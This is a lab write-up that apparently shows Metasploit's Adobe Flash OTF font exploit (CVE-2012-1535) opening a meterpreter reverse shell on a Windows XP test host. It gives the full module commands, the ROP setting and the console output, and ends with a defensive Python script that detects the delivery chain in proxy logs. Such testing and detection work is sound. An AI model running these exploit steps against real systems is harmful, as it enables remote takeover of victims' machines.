Details of the vulnerability are at the link below.
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1535
The Metasploit module information is at the link below.
http://www.metasploit.com/modules/exploit/windows/browser/adobe_flash_otf_font
I installed flashplayer11_2r202_228_winax_32bit.exe on Windows XP and ran the module in Metasploit as shown below; the first attempt failed.
msf > use exploit/windows/browser/adobe_flash_otf_font
msf exploit(adobe_flash_otf_font) > rexploit
[*] Reloading module...
[*] Exploit running as background job.
[*] Started reverse handler on 172.16.0.80:4444
[*] SWF Loaded: 31941 bytes
[*] Using URL: http://0.0.0.0:8080/X8CVKazCkgdN5X
msf exploit(adobe_flash_otf_font) > [*] Local IP: http://172.16.0.80:8080/X8CVKazCkgdN5X
[*] Server started.
msf exploit(adobe_flash_otf_font) >
[*] 172.16.0.100 adobe_flash_otf_font - User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[*] 172.16.0.100 adobe_flash_otf_font - Client requesting: /X8CVKazCkgdN5X
[*] 172.16.0.100 adobe_flash_otf_font - Sending HTML
[*] 172.16.0.100 adobe_flash_otf_font - User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[*] 172.16.0.100 adobe_flash_otf_font - Client requesting: /X8CVKazCkgdN5X5euz.swf
[*] 172.16.0.100 adobe_flash_otf_font - Sending SWF
[*] 172.16.0.100 adobe_flash_otf_font - User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[*] 172.16.0.100 adobe_flash_otf_font - Client requesting: /pay.txt
[*] 172.16.0.100 adobe_flash_otf_font - Sending Payload
msf exploit(adobe_flash_otf_font) >
The Metasploit blog said something like "on Windows XP you can set the ROP chain option to JRE!!", so I tried that and it succeeded.
https://community.rapid7.com/community/metasploit/blog/2012/08/17/adobe-flash-player-exploit-cve-2012-1535-now-available-for-metasploit
I haven't gone as far as checking the memory state, so I don't know the details, but if you just want to try it on Windows without thinking too hard, using JRE is more likely to succeed.
msf > use exploit/windows/browser/adobe_flash_otf_font
msf exploit(adobe_flash_otf_font) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_otf_font) > set srvhost 172.16.0.80
srvhost => 172.16.0.80
msf exploit(adobe_flash_otf_font) > set srvport 80
srvport => 80
msf exploit(adobe_flash_otf_font) > set lhost 172.16.0.80
lhost => 172.16.0.80
msf exploit(adobe_flash_otf_font) > set lport 8080
lport => 8080
msf exploit(adobe_flash_otf_font) > set uripath test
uripath => test
msf exploit(adobe_flash_otf_font) > set ROP JRE
ROP => JRE
msf exploit(adobe_flash_otf_font) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 172.16.0.80:8080
[*] SWF Loaded: 31941 bytes
[*] Using URL: http://172.16.0.80:80/test
[*] Server started.
msf exploit(adobe_flash_otf_font) > [*] 172.16.0.100 adobe_flash_otf_font - User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[*] 172.16.0.100 adobe_flash_otf_font - Client requesting: /test
[*] 172.16.0.100 adobe_flash_otf_font - Sending HTML
[*] 172.16.0.100 adobe_flash_otf_font - User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[*] 172.16.0.100 adobe_flash_otf_font - Client requesting: /test6QWwOQw.swf
[*] 172.16.0.100 adobe_flash_otf_font - Sending SWF
[*] 172.16.0.100 adobe_flash_otf_font - User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
[*] 172.16.0.100 adobe_flash_otf_font - Client requesting: /pay.txt
[*] 172.16.0.100 adobe_flash_otf_font - Sending Payload
[*] Sending stage (752128 bytes) to 172.16.0.100
[*] Meterpreter session 1 opened (172.16.0.80:8080 -> 172.16.0.100:1052) at 2012-08-20 22:34:05 +0900
[*] Session ID 1 (172.16.0.80:8080 -> 172.16.0.100:1052) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (184)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 128
[+] Successfully migrated to process
msf exploit(adobe_flash_otf_font) >
msf exploit(adobe_flash_otf_font) > show sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 HOGEHOGE\hogehoge @ HOGEHOGE-71815D 172.16.0.80:8080 -> 172.16.0.100:1052 (172.16.0.100)
msf exploit(adobe_flash_otf_font) >
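The request sequence visible in the console output above (a landing page, then an SWF whose name is the landing path plus a random suffix, then /pay.txt) is also what a proxy log on the defending side would record. As an added example that is not part of the original post, this Python script flags that chain per client/host pair in CLF-style proxy log lines; the log lines, timestamps and the second client are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed CLF-style proxy log lines (not from the original post) that replay
# the request sequence shown in the Metasploit console, plus a benign client.
SAMPLE_LOG = """\
172.16.0.100 - - [20/Aug/2012:22:33:50 +0900] "GET http://172.16.0.80/test HTTP/1.1" 200 1532
172.16.0.100 - - [20/Aug/2012:22:33:51 +0900] "GET http://172.16.0.80/test6QWwOQw.swf HTTP/1.1" 200 31941
172.16.0.100 - - [20/Aug/2012:22:33:52 +0900] "GET http://172.16.0.80/pay.txt HTTP/1.1" 200 752128
172.16.0.101 - - [20/Aug/2012:22:40:00 +0900] "GET http://example.test/index.html HTTP/1.1" 200 900
172.16.0.101 - - [20/Aug/2012:22:40:01 +0900] "GET http://example.test/movie.swf HTTP/1.1" 200 5000
"""

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "GET http://(?P<host>[^/\s]+)(?P<path>\S*) HTTP/[\d.]+"'
)


def parse(log_text):
    """Yield (src, host, path) for every line that parses as a CLF GET request."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.group("src"), m.group("host"), m.group("path")


def find_flash_delivery_chains(log_text):
    """Return [(src, host, landing_path)] for each client that fetched, from one host,
    a landing page, then an .swf whose name starts with that landing path, then /pay.txt.
    The SWF-name prefix and the /pay.txt request are the module's pattern as seen above."""
    per_pair = defaultdict(list)
    for src, host, path in parse(log_text):
        per_pair[(src, host)].append(path)  # keep request order per client/host
    hits = []
    for (src, host), paths in per_pair.items():
        for i, landing in enumerate(paths):
            if landing.endswith(".swf") or landing == "/pay.txt":
                continue  # candidate landing pages only
            later = paths[i + 1:]
            swf_seen = any(p.endswith(".swf") and p.startswith(landing) and p != landing for p in later)
            payload_seen = "/pay.txt" in later
            if swf_seen and payload_seen:
                hits.append((src, host, landing))
                break  # one alert per client/host pair is enough
    return hits


if __name__ == "__main__":
    for src, host, landing in find_flash_delivery_chains(SAMPLE_LOG):
        print(f"possible CVE-2012-1535 delivery chain: {src} -> {host}{landing}")
```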